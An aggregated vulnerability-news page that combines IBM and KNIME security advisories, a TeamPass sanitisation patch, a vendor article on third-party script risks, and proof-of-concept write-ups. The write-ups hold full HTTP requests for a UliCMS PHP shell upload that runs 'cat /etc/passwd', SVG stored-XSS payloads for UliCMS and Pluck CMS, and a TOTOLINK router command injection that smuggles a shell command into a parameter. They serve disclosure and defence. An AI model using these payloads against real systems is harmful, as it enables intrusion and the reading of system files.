IBM Business Automation Workflow 18.0.0.0, 18.0.0.1, 18.0.0.2, 19.0.0.1, 19.0.0.2, 19.0.0.3, 20.0.0.1, 20.0.0.2, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  IBM X-Force ID:  246115.

**Security Bulletin**

  

**Summary**

IBM Business Automation Workflow is vulnerable to a Stored cross-site vulnerability when performing a document upload using Responsive Document Explorer.

**Vulnerability Details**

**CVEID:**   CVE-2023-24957  
**DESCRIPTION:**   IBM Business Automation Workflow is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/246115 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Status

IBM Business Automation Workflow containers

V22.0.2 - V22.0.2-IF001  
V22.0.1 all fixes  
V21.0.3 - V21.0.3-IF017  
V21.0.2 all fixes  
V20.0.0.2 all fixes  
V20.0.0.1 all fixes

affected

IBM Business Automation Workflow traditional

V22.0.1 - V22.0.2  
V21.0.1 - V21.0.3.1  
V20.0.0.1 - V20.0.0.2  
V19.0.0.1 - V19.0.0.3

affected

For earlier and unsupported versions of the products, IBM recommends upgrading to a fixed, supported version of the product.

  

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

The vulnerability was reported to IBM by Ahmed Samy (https://www.linkedin.com/in/ahmed-samy2 ) and Abdelrahman Amhawy

**Change History**

21 Mar 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS8JB4","label":"IBM Business Automation Workflow"},"Component":"","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"18.0.0.0, 18.0.0.1, 18.0.0.2, 19.0.0.1, 19.0.0.2, 19.0.0.3,20.0.0.1, 20.0.0.2,21.0.2,21.0.3,22.0.1, 22.0.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSRSIY","label":"IBM Business Automation Workflow Enterprise Service Bus"},"Component":"","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"22.0.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2023-24957: Security Bulletin: Stored cross-site vulnerability when performing a document upload using Responsive Document Explorer affect IBM Business Automation Workflow

Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.7.

Expand Up @@ -2795,30 +2795,30 @@ function(teampassApplication) { var data \= { 'anyone\_can\_modify': $('#form-item-anyoneCanModify').is(':checked') ? 1 : 0, 'complexity\_level': parseInt($('#form-item-password-complex').val()), 'description': $('#form-item-description').summernote('code') !== "<p><br></p>" ? $('#form-item-description').summernote('code') : '', 'description': $('#form-item-description').summernote('code') !== "<p><br></p>" ? DOMPurify.sanitize($('#form-item-description').summernote('code'), {USE\_PROFILES: {html: true}}) : '', 'diffusion\_list': diffusion, 'diffusion\_list\_names': diffusionNames, 'folder': parseInt($('#form-item-folder').val()), 'email': $('#form-item-email').val(), 'email': DOMPurify.sanitize($('#form-item-email').val()), 'fields': fields, 'folder\_is\_personal': store.get('teampassItem').IsPersonalFolder \=== 1 ? 1 : 0, 'id': store.get('teampassItem').id, 'label': $('#form-item-label').val(), 'login': $('#form-item-login').val(), 'label': DOMPurify.sanitize($('#form-item-label').val()), 'login': DOMPurify.sanitize($('#form-item-login').val()), 'pw': $('#form-item-password').val(), 'restricted\_to': restriction, 'restricted\_to\_roles': restrictionRole, 'tags': $('#form-item-tags').val(), 'tags': DOMPurify.sanitize($('#form-item-tags').val()), 'template\_id': parseInt($('input.form-check-input-template:checkbox:checked').data('category-id')), 'to\_be\_deleted\_after\_date': ($('#form-item-deleteAfterDate').length !== 0 && $('#form-item-deleteAfterDate').val() !== '') ? $('#form-item-deleteAfterDate').val() : '', 'to\_be\_deleted\_after\_x\_views': ($('#form-item-deleteAfterShown').length !== 0 && $('#form-item-deleteAfterShown').val() !== '' && $('#form-item-deleteAfterShown').val() \>= 1) ? parseInt($('#form-item-deleteAfterShown').val()) : '', 'url': $('#form-item-url').val(), 'url': DOMPurify.sanitize($('#form-item-url').val()), 'user\_id': parseInt('<?php echo $\_SESSION\['user\_id'\]; ?>'), 'uploaded\_file\_id': store.get('teampassApplication').uploadedFileId \=== undefined ? '' : store.get('teampassApplication').uploadedFileId, 'fa\_icon': $('#form-item-icon').val(), 'fa\_icon': DOMPurify.sanitize($('#form-item-icon').val()), }; if (debugJavascript \=== true) { console.log('SAVING DATA'); Expand Down

CVE-2023-2516: 3.0.7 · nilsteampassnet/TeamPass@39b774c

IBM Maximo Asset Management 7.6.1.2 and 7.6.1.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  IBM X-Force ID:  239436.

CVE-2022-43866

UliCMS version 2023-1 Sniffing-Vicuna suffers from a remote shell upload vulnerability.

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)  
#Application: Ulicms  
#Version: 2023.1-sniffing-vicuna  
#Bugs:  RCE  
#Technology: PHP  
#Vendor URL: https://en.ulicms.de/  
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip  
#Date of found: 04-05-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Login to account and edit profile.

2.Upload new Avatar

3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error

payload: <?php echo system("cat /etc/passwd"); ?>

poc request :

POST /dist/admin/index.php HTTP/1.1  
Host: localhost  
Content-Length: 1982  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv  
Connection: close

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="csrf_token"

e2d428bc0585c06c651ca8b51b72fa58  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sClass"

UserController  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sMethod"

update  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="avatar"; filename="salam.phar"  
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="edit_admin"

edit_admin  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="id"

12  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="firstname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="lastname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="email"

account1@test.com  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password_repeat"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="group_id"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="secondary_groups[]"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="homepage"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="html_editor"

ckeditor  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="admin"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="default_language"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="about_me"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy--

response:

Error  
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67  
Stack trace:  
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#7 {main}

Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73  
Stack trace:  
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#6 {main}

4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)

UliCMS 2023-1 Sniffing-Vicuna Shell Upload

UliCMS version 2023-1 Sniffing-Vicuna suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:  Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABClX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36sec-ch-ua-platform: "Linux"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/dist/admin/fm/dialog.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delvConnection: close------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="fldr"------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryK3CvcSs8xZwzABCl--3. Go to http://localhost/dist/content/SVG_XSS.svg

UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting

Pluck CMS version 4.7.18 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)Application: pluckVersion: 4.7.18Bugs:  XSSTechnology: PHPVendor URL: https://github.com/pluck-cms/pluckSoftware Link: https://github.com/pluck-cms/pluckDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. create .svg file.2. svg file content:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)poc requestPOST /pluck-4.7.18/admin.php?action=files HTTP/1.1Host: localhostContent-Length: 672Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/pluck-4.7.18/admin.php?action=filesAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8deConnection: close------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryJMTiFxESCx7aNqmI--4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg

Pluck CMS 4.7.18 Cross Site Scripting

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

TOTOLINK X5000R (V9.1.0u.6369\_B20230113)was found to contain a command insertion vulnerability in setting/setTracerouteCfg.This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.3.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 82
    Origin: http://192.168.3.2
    Connection: close
    Referer: http://192.168.3.2/advance/traceroute.html?time=1679125513355
    Cookie: SESSION_ID=2:1679122532:2
    
    {"command":"127.0.0.1; pwd > /tmp/1.txt;","num":"4","topicurl":"setTracerouteCfg"}
    

Finally, you can write exp to get a stable root shell without authorization.

CVE-2023-30013: vuln/TOTOLINK/X5000R/2 at main · Kazamayc/vuln

Third-party apps such as Google Analytics, Meta Pixel, HotJar, and JQuery have become critical tools for businesses to optimize their website performance and services for a global audience. However, as their importance has grown, so has the threat of cyber incidents involving unmanaged third-party apps and open-source tools. Online businesses increasingly struggle to maintain complete visibility

Third-party apps such as Google Analytics, Meta Pixel, HotJar, and JQuery have become critical tools for businesses to optimize their website performance and services for a global audience. However, as their importance has grown, so has the threat of cyber incidents involving unmanaged third-party apps and open-source tools. Online businesses increasingly struggle to maintain complete visibility and control over the ever-changing third-party threat landscape, with sophisticated threats like evasive skimmers, Magecart attacks, and unlawful tracking practices potentially causing severe damage.

This article explores the challenges of protecting modern websites from third-party scripts and the security risks associated with a lack of visibility over these scripts.

****Invisible to Standard Security Controls****

Third-party scripts are often invisible to standard security controls like Web Application Firewalls (WAFs) because they are loaded from external sources that are not under the control of the website owner. When a website loads a third-party script, it is executed in the user's browser alongside the website's own code. This means that a WAF, which is typically placed in front of a website to inspect and filter incoming traffic, may not be able to detect and block malicious activity originating from a third-party script.

Moreover, third-party scripts often use obfuscation techniques to hide their true purpose or to evade detection by security controls. This can make it even more difficult for security controls to identify and mitigate potential threats. **Therefore, it is important for website owners to take additional steps to monitor and control the behavior of third-party scripts.**

****The Security Risks Caused by Lack of Visibility****

Lack of visibility over your third-party web apps and open-source tools can pose several security risks to an organization, including:

1.  **Data breaches:** Third-party apps often have access to sensitive data, and a lack of visibility over these apps can make it difficult to detect and prevent data breaches or unauthorized access to sensitive information.
2.  **Malware and viruses:** Third-party apps may introduce malware or viruses into your organization's systems, which can infect other systems and result in data loss or system downtime.
3.  **Compliance violations:** Third-party apps that are not properly vetted or do not comply with regulatory requirements can expose an organization to legal and financial risks, such as fines and lawsuits.
4.  **Network vulnerabilities:** Third-party apps that are integrated with an organization's systems can create network vulnerabilities that can be exploited by cybercriminals.
5.  **Poor security practices:** Some third-party apps may not have strong security controls in place, which can increase the risk of security incidents and data breaches.

**To mitigate these risks, it is essential to have a thorough understanding of the third-party apps used by an organization and to implement strong security controls and processes, such as continuous security assessments, monitoring, and patching.** Additionally, it is important to have clear policies and procedures in place for selecting, vetting, and managing third-party apps to ensure that they meet the organization's security and compliance requirements.

****External/Installed Monitoring Solutions****

Effective monitoring of third-party scripts requires external or installed monitoring solutions. Many businesses install security scripts on their websites to protect against known threats and vulnerabilities. However, these scripts are unable to access many third-party components like iFrames and the scripts they contain, as they are limited by browsing restrictions. While this approach of embedded monitoring was designed to increase the security of web components, it creates limitations for installed JavaScript to provide full security because these iFrames include trackers, pixels, and multiple unmanaged third-party scripts.

The lack of visibility over third-party scripts is a significant challenge for businesses as it limits their ability to map all trackers, detect data leakage, and create a working inventory of third-party apps and scripts. Critical activities, such as detecting CVE for JS frameworks, tracking pixels like Meta and TikTok, and tag misconfiguration, are limited because these components are rendered inaccessible. This limitation exposes businesses to the risk of **data harvesting**, which can result in lost revenue, damaged reputation, and regulatory fines.

****Enhanced Visibility Achieved with External Monitoring****

Embedded website monitoring solutions suffer from a lack of visibility. Therefore, an external monitoring solution might be the answer to solving this challenge. Just recently, Reflectiz, an external monitoring solution, helped a big financial services company detect suspicious activity related to the **TikTok pixel**. The company utilized Reflectiz on its website to monitor its security, and the solution detected unauthorized activity related to the pixel: the TikTok pixel script was accessing sensitive input data in one of their login forms. TikTok had updated its pixel, and the new version had been "painting" users on the website, accessing personal information, and transmitting the info to their servers. The Reflectiz investigation team provided clear mitigation steps to terminate the pixel's unapproved activity right away.

This case is a clear example of how monitoring your website from the outside gives you enhanced visibility over the modern attack surface, unlike installed monitoring solutions that simply don't see the full picture and are unable to effectively monitor third-party website components like iFrames, tags, and pixels.

Screenshot of the rogue Tiktok pixel detection

****Maintain watertight security against third-party scripts****

So, what can you do to protect your websites from the risks associated with third-party scripts? Here are some tips:

1.  **Conduct regular security audits:** Regularly audit your website and third-party services to identify vulnerabilities and address them promptly.
2.  **Use external website monitoring solutions:** Implement website monitoring solutions that can detect suspicious activity and provide clear mitigation steps to address it.
3.  **Use secure hosting:** Choose a secure hosting provider that provides regular backups, monitoring, and security updates.
4.  **Educate your employees:** Train your employees to recognize potential threats and educate them about safe online practices.
5.  **Use two-factor authentication:** Require two-factor authentication for all sensitive areas of your website, such as the admin panel and checkout page.
6.  **Use content security policies:** Implement content security policies that restrict the types of content that can be loaded on your website.
7.  **Keep software up to date:** Regularly update your website's software, including any third-party services, to ensure that known vulnerabilities are patched.

In conclusion, the increasing reliance on third-party scripts has brought about new challenges to online businesses seeking to maintain the security and privacy of their users. The lack of visibility over these scripts increases the possibility of data breaches, cyberattacks, and compliance violations. To mitigate these risks, **businesses need to understand the third-party apps used by their organizations and implement strong security controls and processes.** External website monitoring solutions, like **Reflectiz**, can significantly enhance online visibility and provide clear mitigation steps to address suspicious activities related to third-party scripts.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Lack of Visibility: The Challenge of Protecting Websites from Third-Party Scripts

Sensitive information exposure in the Web Frontend of KNIME Business Hub until 1.X allows an unauthenticated attacker to extract information about the system. By making a request to a non-existent URL the system will  sensitive information to the caller such as internal IP addresses, hostnames, Istio
metadata, internal file paths and more.

The problem is fixed in KNIME Business Hub 1.xxx. There is no workaround for previous versions.




This page summarizes all security advisories for KNIME Software products and services, including KNIME Analytics Platform, KNIME Server, and KNIME Hub.

Please note that the CVSS Score is an indication of the potential _severity_ of the issue but not the _risk_. The actual risk needs to be assessed by every user individually because there may be circumstances where a high severity issue is not applicable and therefore does not pose a risk (and vice-versa).

If you want to know more about the CVSS Score, have a look at the resources provided by the Common Vulnerability Scoring System SIG.

**CVE-2022-44749 - Opening workflows in KNIME Analytics Platform from untrusted sources may override arbitrary file system contents**

*   Published: 2022-11-24
*   Affected Products: KNIME Analytics Platform since 3.2.0
*   Fixed Products: KNIME Analytics Platform 4.6.4
*   Base CVSS Score: 5.5
*   CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:F/RL:O/RC:C/CR:X/IR:L/AR:X/MAV:L/MAC:L/MPR:N/MUI:R/MS:U/MC:N/MI:H/MA:N

A directory traversal vulnerability in the ZIP archive extraction routines of any version of KNIME Analytics Platform can result in arbitrary files being overwritten on the user's system. This vulnerability is also known as 'Zip-Slip'.

An attacker can create a KNIME workflow that, when being opened by a user, can overwrite arbitrary files that the user has write access to. It's not necessary to execute the workflow, opening the workflow is sufficient. The user will notice that something is wrong because an error is being reported but only after the files have already been written.

This can impact data integrity (file contents are changed) or cause errors in other software (vital files being corrupted). It can even lead to remote code execution if executable files are being replaced and subsequently executed by the user.

As a workaround do not open workflows from untrusted sources. Updates to fixed versions 4.6.4 (or 4.4.5 and 4.5.3 once they become available) are advised.

This vulnerability was found internally.

**CVE-2022-44748 - Uploading workflows to KNIME Server may override arbitrary file system contents**

*   Published: 2022-11-24
*   Affected Products: KNIME Server since 4.3.0
*   Fixed Products: KNIME Server 4.13.6, 4.14.3, 4.15.3
*   Base CVSS Score: 7.1
*   CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L/E:F/RL:O/RC:C/CR:X/IR:L/AR:L/MAV:N/MAC:L/MPR:L/MUI:N/MS:U/MC:N/MI:H/MA:L

A directory traversal vulnerability in the ZIP archive extraction routines of KNIME Server 4.3.0 and above can result in arbitrary files being overwritten on the server's file system. This vulnerability is also known as 'Zip-Slip'.

An attacker can create a KNIME workflow that, when being uploaded, can overwrite arbitrary files that the operating system user running the KNIME Server process has write access to. The user must be authenticated and have permissions to upload files to KNIME Server.

This can impact data integrity (file contents are changed) or cause errors in other software (vital files being corrupted). It can even lead to remote code execution if executable files are being replaced and subsequently executed by the KNIME Server process user. In all cases the attacker has to know the location of files on the server's file system, though.

Note that users that have permissions to upload workflows usually also have permissions to run them on the KNIME Server and can therefore already execute arbitrary code in the context of the KNIME Executor's operating system user. Therefore we score the risk of this vulnerability as low.

There is no workaround to prevent this vulnerability from being exploited. Updates to fixed versions 4.13.6, 4.14.3, or 4.15.3 are advised

This vulnerability was found internally.

**External CVE-2022-42889 - Vulnerability in Apache Commons Text**

*   Published: 2022-10-25 and updated 2022-10-28
*   Affected Product: _none_

A vulnerability in the _StringLookup_ class of Apache Commons Text (versions below 1.10) has recently been disclosed. It allows remote code execution under certain circumstances and was therefore given a CVSS Score of 9.8. Both KNIME Analytics Platform and KNIME Server make use of Apache Commons Text but **not** of the affected class. This means our own code is not vulnerable and therefore there is no risk for KNIME users. Also Apache Spark, which is part of the _KNIME Extension for Local Big Data Environments_ and uses Apache Commons Text as well, is not affected by the vulnerability.

**CVE-2022-31500 - Windows installer for KNIME Analytics Platform allows for privilege escalation**

*   Published: 2022-05-24
*   Affected Product: KNIME Analytics Platform before 4.6.0
*   Base CVSS Score: 8.2
*   Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:F/RL:T/RC:X/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:N/MUI:R/MS:C/MC:H/MI:H/MA:H

The installer for KNIME Analytics Platform on Windows before 4.6.0 makes the installation directory writeable to everyone on the system. This is useful so that the user can update or install extensions from a running KNIME Analytics Platform without having to restart the application as administrator. However, this also allows other authenticated local users on the system to (re)place malicious files in the installation e.g. replacing the uninstall program. The latter is run with administration privileges if the application is being uninstalled (by a user with administrative privileges). Starting with KNIME Analytics Platform 4.6.0 the installer will restrict write access to the installation directory to admin users. This also means that in order to update or install additional extensions, KNIME Analytics Platform must first be started with admin privileges.

Note that the KNIME Server installer for Windows, which can create a KNIME Analytics Platform installation used as an executor, is **not** affected.

**Workaround**

Existing installations can be "fixed" by restricting the permissions of the installation folder manually. If you use the self-extracting archive or the ZIP file the default permissions on Windows apply, which usually means that only the extracting user has write permissions on the installation directory. In this case update or installation of extensions is possible without starting KNIME Analytics Platform as admin user.

The vulnerability was found and reported by Łukasz Rupala & Przemysław Mazurek.

**CVE-2021-45096 - External XML Entity Injection with specially crafted workflow files**

*   Published: 2021-12-16
*   Affected Product: KNIME Analytics Platform before 4.5.0
*   Base CVSS Score: 4.3
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

KNIME Analytics Platform before 4.5.0 with resolve external entities in workflow.knime files when loading a workflow. Using a specially crafted workflow file, potentially sensitive information such as Windows network password hashes maybe leaked _to_ a remote system. It can not be used to leak information _from_ a remote system e.g. when a workflow is loaded on KNIME Server.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

****CVE-2021-45097 -** Server installer does not restrict permission on auto-install.xml**

*   Published: 2021-12-16
*   Affected Product: KNIME Server before 4.12.6 and 4.13.x before 4.13.4
*   Base CVSS Score: 2.9
